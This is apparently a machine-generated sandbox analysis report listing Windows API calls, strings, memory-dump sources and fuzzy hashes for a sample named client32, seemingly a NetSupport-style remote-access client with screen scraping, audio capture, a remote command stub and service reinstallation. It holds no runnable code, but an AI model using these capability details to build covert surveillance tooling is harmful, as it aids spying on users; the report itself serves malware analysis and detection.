  • Part of subcall function 11141710: _strncpy.LIBCMT ref: 1114186A
  • Part of subcall function 110B6BD0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B6BF6
  • Part of subcall function 110B6BD0: GetProcAddress.KERNEL32(00000000), ref: 110B6BFD
  • Part of subcall function 110B6BD0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B6C13
  • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
  • Part of subcall function 110EAED0: RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EB538,?,?,00020019,24DE4E77), ref: 110EAEEC
• GetSystemMetrics.USER32(00000043), ref: 110276A4
  • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
  • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
  • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
• wsprintfA.USER32 ref: 110276CB
  • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
  • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
  • Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F
• wsprintfA.USER32 ref: 110276F5
• _memset.LIBCMT ref: 11027730
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?), ref: 11027785
• CloseHandle.KERNEL32(?), ref: 1102779C
• CloseHandle.KERNEL32(?), ref: 110277A5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$CloseCreateFile$FolderModuleOpenPathProcess_memsetwsprintf$AddressCurrentMetricsNameProcSystemVersion__wcstoi64_strncpy
                                                                                                                                                                                                    • String ID: /Q /Q$"%sWINST32.EXE"$"%sWINSTALL.EXE"$AutoInstallGdihook5$Client$D$System\CurrentControlSet\Services\Gdihook5$Trying to reinstall gdihook5$screenscrape
                                                                                                                                                                                                    • API String ID: 1724249554-531500863
                                                                                                                                                                                                    • Opcode ID: 6aaef0e5ddedcf15d348c0cb49900692044a3b95a90220cee4c587b42f452f78
                                                                                                                                                                                                    • Instruction ID: d2b55fc42617096dc1e54143e0f6b596911c59ff24b6e1298e75f3af09eb386e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6aaef0e5ddedcf15d348c0cb49900692044a3b95a90220cee4c587b42f452f78
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B41FA74E4062AAAEB50DBA0CC85FEDF7B8AB14708F1041D5E929B72C0EB70B544CB54
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memset.LIBCMT ref: 110594C3
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,74DF2EF0,74DF2EE0,74E02D70), ref: 11059504
                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11059516
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11059520
                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 1105952C
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11059536
                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11059542
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1105954C
                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11059558
                                                                                                                                                                                                    • ResetEvent.KERNEL32(00000000), ref: 11059560
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1105958D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 11059639
                                                                                                                                                                                                      • Part of subcall function 1108BC20: _memset.LIBCMT ref: 1108BC89
                                                                                                                                                                                                      • Part of subcall function 1108BC20: GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,110EAA59,0000070B), ref: 1108BCA2
                                                                                                                                                                                                      • Part of subcall function 1108BC20: GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,?,?,110EAA59,0000070B), ref: 1108BCD4
                                                                                                                                                                                                      • Part of subcall function 1108BC20: CloseHandle.KERNEL32(00000000), ref: 1108BD0C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Handle$EventInformation$Create$Close_memset$ResetTokenVersionwsprintf
• String ID: CloseHandle_1$D$remcmdstub.exe %u %u %u %u %%COMSPEC%%
• API String ID: 3301782102-1870880251
• Opcode ID: 99f25927b6cb76179c42b9a4f734931d8e8205977da96904174c65bee3cf05ba
• Instruction ID: 9498dede17ae523b820893f7966d078463fb7189cb60d919b27b44eccd4d473b
• Opcode Fuzzy Hash: 99f25927b6cb76179c42b9a4f734931d8e8205977da96904174c65bee3cf05ba
• Instruction Fuzzy Hash: C8516675A41328ABEB51CF98CC85FEAB7B9EB48B04F004099F718E72C4E6B16940CF55
APIs
• InitializeCriticalSection.KERNEL32(0000001C), ref: 1112117E
• GetCurrentThreadId.KERNEL32 ref: 111211B5
• GlobalAddAtomA.KERNEL32(NSMRemote32), ref: 111213AA
• GetVersionExA.KERNEL32(?,?,?,00000000), ref: 111213D3
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AtomCriticalCurrentGlobalInitializeSectionThreadVersion
• String ID: IgnoreScrape$LegacyScrape$LimitColorbits$MaxLag$NSMRemote32$ScaleToFitMode$ScaleToFitTilingFactor$Show$ShowBigBlits$View
• API String ID: 3042533059-2538903574
• Opcode ID: fbf171a93a064c4978fa1075158420c735f9f0bd711a0402550495a255e203ec
• Instruction ID: eb6122d518b0ca6329e0510ddbb3154fc8dc97cf8e450e1036336aff3cebea76
• Opcode Fuzzy Hash: fbf171a93a064c4978fa1075158420c735f9f0bd711a0402550495a255e203ec
• Instruction Fuzzy Hash: 59B18CB8A00705AFD760CF65CD84B9BFBF5AF85704F20856EE55A9B280DB30A940CF51
APIs
• wsprintfA.USER32 ref: 110416EC
• wsprintfA.USER32 ref: 1104171E
• wsprintfA.USER32 ref: 11041769
• _memset.LIBCMT ref: 11041776
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 110417AE
• CloseHandle.KERNEL32(?), ref: 110417C5
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110417CE
                                                                                                                                                                                                      • Part of subcall function 11094E70: LoadLibraryA.KERNEL32(USER32,?,?,110077D5), ref: 11094E79
                                                                                                                                                                                                      • Part of subcall function 11094E70: GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 11094E8D
                                                                                                                                                                                                      • Part of subcall function 11094E70: GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 11094E9A
                                                                                                                                                                                                      • Part of subcall function 11094E70: GetProcAddress.KERNEL32(?,EnumDisplayDevicesA), ref: 11094EA7
                                                                                                                                                                                                      • Part of subcall function 11094E70: GetProcAddress.KERNEL32(?,MonitorFromRect), ref: 11094EB4
                                                                                                                                                                                                      • Part of subcall function 11094E70: _memset.LIBCMT ref: 11094EC4
                                                                                                                                                                                                      • Part of subcall function 11094DC0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 11094DDD
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                      • Part of subcall function 11015410: GlobalAddAtomA.KERNEL32(NSMIdentifyWnd), ref: 11015426
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProcwsprintf$_memset$CloseHandle$AtomCreateGlobalInfoLibraryLoadParametersProcessSystem
                                                                                                                                                                                                    • String ID: %s %s$%sPlaySound.exe$%sSounds\%s$D$RandomSelect$StudentPicked.wav$StudentSelected.wav
                                                                                                                                                                                                    • API String ID: 2679228845-3892444432
                                                                                                                                                                                                    • Opcode ID: b3725c502d2789fe40fbb26aadf6588f8ed80d9f12081c1d57b9f8c917426c69
                                                                                                                                                                                                    • Instruction ID: 9c2d6cc32ef246ace46494575b6d7f0e632273de9197a299b6468622a4a2010b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3725c502d2789fe40fbb26aadf6588f8ed80d9f12081c1d57b9f8c917426c69
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A7187B5E4021E6BEB15DB50DC81FDEB7B8AB04718F1041D9E619A71C0EA70BB44CFA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,Audio,DisableSounds,00000000,00000000,24DE4E77), ref: 1100B3BB
                                                                                                                                                                                                    • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 1100B3D8
                                                                                                                                                                                                    • _calloc.LIBCMT ref: 1100B409
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1100B42F
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1100B469
                                                                                                                                                                                                      • Part of subcall function 1100AC60: EnterCriticalSection.KERNEL32(?,24DE4E77), ref: 1100ACA4
                                                                                                                                                                                                      • Part of subcall function 1100AC60: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACC2
                                                                                                                                                                                                      • Part of subcall function 1100AC60: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100AD0E
                                                                                                                                                                                                      • Part of subcall function 1100AC60: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD55
                                                                                                                                                                                                      • Part of subcall function 1100AC60: CloseHandle.KERNEL32(00000000), ref: 1100AD5C
                                                                                                                                                                                                      • Part of subcall function 1100AC60: _free.LIBCMT ref: 1100AD73
                                                                                                                                                                                                      • Part of subcall function 1100AC60: FreeLibrary.KERNEL32(?), ref: 1100AD8B
                                                                                                                                                                                                      • Part of subcall function 1100AC60: LeaveCriticalSection.KERNEL32(?), ref: 1100AD95
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1100B48E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Vista AddAudioCapEvtListener(%p), xrefs: 1100B513
                                                                                                                                                                                                    • \\.\NSAudioFilter, xrefs: 1100B3D0
                                                                                                                                                                                                    • DisableSounds, xrefs: 1100B362
                                                                                                                                                                                                    • Audio, xrefs: 1100B367
                                                                                                                                                                                                    • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B53C
                                                                                                                                                                                                    • InitCaptureSounds NT6, xrefs: 1100B4AE
                                                                                                                                                                                                    • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4E3
                                                                                                                                                                                                    • Vista new pAudioCap=%p, xrefs: 1100B4F3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressCloseEventExchangeFileFreeHandleInterlockedLoadProc__wcstoi64_calloc_free
                                                                                                                                                                                                    • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                                                                                                                                    • API String ID: 2005284756-2362500394
                                                                                                                                                                                                    • Opcode ID: 1b3ff62302edfe70963872ecb882b6fdc49eed430e431981be697212f47832f9
                                                                                                                                                                                                    • Instruction ID: 13704de1d539ef30c3066c3cc5484e22fa9722ec6e344ec07ec17af159e95cc0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b3ff62302edfe70963872ecb882b6fdc49eed430e431981be697212f47832f9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A951D8B5E04A4AAFE714CF64DC80BAEF7E8FB04359F10467EE92993640E731765087A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                    • ShowCursor.USER32(00000000), ref: 110F55DD
                                                                                                                                                                                                    • OpenEventA.KERNEL32(00100000,00000000,NSBlankExit), ref: 110F55EE
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000000BF), ref: 110F5614
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F5633
• TranslateMessage.USER32(?), ref: 110F5644
• DispatchMessageA.USER32(?), ref: 110F564D
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F5661
• CloseHandle.KERNEL32(?), ref: 110F5674
• GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F568C
• TranslateMessage.USER32(?), ref: 110F56A7
• DispatchMessageA.USER32(?), ref: 110F56B0
• GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F56BF
• ShowCursor.USER32(00000001), ref: 110F56CD
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Message$CursorDispatchMultipleObjectsShowTranslateWait$CloseEventHandleOpen_memsetwsprintf
• String ID: NSBlankExit
• API String ID: 3602634875-773372720
• Opcode ID: e68260c3a4de123fa72860ee07f86da7e712f847a20bfc2a252c0d5c7a084281
• Instruction ID: 5ec7c1be67ca2a78862dc13c18a8ec745b66933f059b542a1e0c74ee0f1129a0
• Opcode Fuzzy Hash: e68260c3a4de123fa72860ee07f86da7e712f847a20bfc2a252c0d5c7a084281
• Instruction Fuzzy Hash: 68513E76E4132EABDB10DF608C85FEDB7B8AB48704F1005A9E615D7184EB75AA40CF91
APIs
• GetTickCount.KERNEL32 ref: 1110313E
• EnterCriticalSection.KERNEL32(111EC5C4), ref: 11103147
• GetTickCount.KERNEL32 ref: 1110314D
• GetTickCount.KERNEL32 ref: 111031A0
• LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031A9
• GetTickCount.KERNEL32 ref: 111031DA
• LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031E3
• EnterCriticalSection.KERNEL32(111EC5C4), ref: 1110320C
• LeaveCriticalSection.KERNEL32(111EC5C4,00000000,?,00000000), ref: 111032D3
  • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
  • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
  • Part of subcall function 110EEA50: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11103277,?), ref: 110EEA7B
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Yara matches
Similarity
• API ID: CriticalSection$CountTick$Leave$Enter$Initialize_memsetwsprintf
• String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
• API String ID: 3572004736-3013461081
• Opcode ID: 2b14e68d4533465ca6ede4850a325a27a31b967f1298800cdcf78ff7dd429e77
• Instruction ID: 751a9e08e7d07462896511fc241fa3711dcdedb17ea13ac702f7fc28ec4d2028
• Opcode Fuzzy Hash: 2b14e68d4533465ca6ede4850a325a27a31b967f1298800cdcf78ff7dd429e77
• Instruction Fuzzy Hash: 9441F67AF04519AFCB11DFE59C85EEEFBB5AB44218B104525F905E7640EB306900CBA1
APIs
• GetTickCount.KERNEL32 ref: 1103B15F
• Sleep.KERNEL32(000001F4), ref: 1103B1A4
• PostMessageA.USER32(0007036E,00000010,00000000,00000000), ref: 1103B1CF
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Yara matches
Similarity
• API ID: CountMessagePostSleepTick
• String ID: AssertOnReboot$CLTCONN.CPP$Client$DisableLogoff$DisablePowerOff$DisableReboot$DisableShutDown$FALSE || !"assertOnReboot"$GPFOnReboot$_debug$sd - Post WM_CLOSE to %08x
• API String ID: 507213284-4185502373
• Opcode ID: edb7ba95a0dbe671a8f45536223d8c402f036747e014dfae0fdba634982649ab
• Instruction ID: f79ec28786b2f4c10a59bc50768d7a54d57fb70274f002d705909bb0de105b61
• Opcode Fuzzy Hash: edb7ba95a0dbe671a8f45536223d8c402f036747e014dfae0fdba634982649ab
• Instruction Fuzzy Hash: 12412934F4065EBEE721CA529C85FBDB795ABC0B0DF5040A5FE247E2C0EB60B4408355
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
• LoadLibraryA.KERNEL32(wlanapi.dll,?,11057147), ref: 1115705B
• GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 11157074
• GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 11157084
• GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 11157094
• GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111570A4
• GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111570B4
• std::exception::exception.LIBCMT ref: 111570CD
• __CxxThrowException@8.LIBCMT ref: 111570E2
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc$Exception@8LibraryLoadThrow_memsetstd::exception::exceptionwsprintf
• String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
• API String ID: 1463381176-1736626566
APIs
  • Part of subcall function 1111B6C0: SelectPalette.GDI32(?,?,00000000), ref: 1111B73C
  • Part of subcall function 1111B6C0: SelectPalette.GDI32(?,?,00000000), ref: 1111B751
  • Part of subcall function 1111B6C0: DeleteObject.GDI32(?), ref: 1111B764
  • Part of subcall function 1111B6C0: DeleteObject.GDI32(?), ref: 1111B771
  • Part of subcall function 1111B6C0: DeleteObject.GDI32(?), ref: 1111B796
• _free.LIBCMT ref: 1111D49D
  • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
  • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
• _free.LIBCMT ref: 1111D4B3
• _free.LIBCMT ref: 1111D4C8
• GdiFlush.GDI32(?,?,?,00728E08), ref: 1111D4D0
• _free.LIBCMT ref: 1111D4DD
• _free.LIBCMT ref: 1111D4F1
• SelectObject.GDI32(?,?), ref: 1111D50D
• DeleteObject.GDI32(?), ref: 1111D51A
• GetLastError.KERNEL32(?,?,?,?,?,00728E08), ref: 1111D524
• DeleteDC.GDI32(?), ref: 1111D54B
• ReleaseDC.USER32(?,?), ref: 1111D55E
• DeleteDC.GDI32(?), ref: 1111D56B
• InterlockedDecrement.KERNEL32(111E59C8), ref: 1111D578
Strings
• Error deleting membm, e=%d, xrefs: 1111D52B
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
• String ID: Error deleting membm, e=%d
• API String ID: 3195047866-709490903
APIs
  • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
• LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000), ref: 110271C0
• LoadIconA.USER32(00000000,00007D0B), ref: 110271D5
• GetSystemMetrics.USER32(00000032), ref: 110271EE
• GetSystemMetrics.USER32(00000031), ref: 110271F3
• LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027203
• LoadIconA.USER32(11000000,00000491), ref: 1102721B
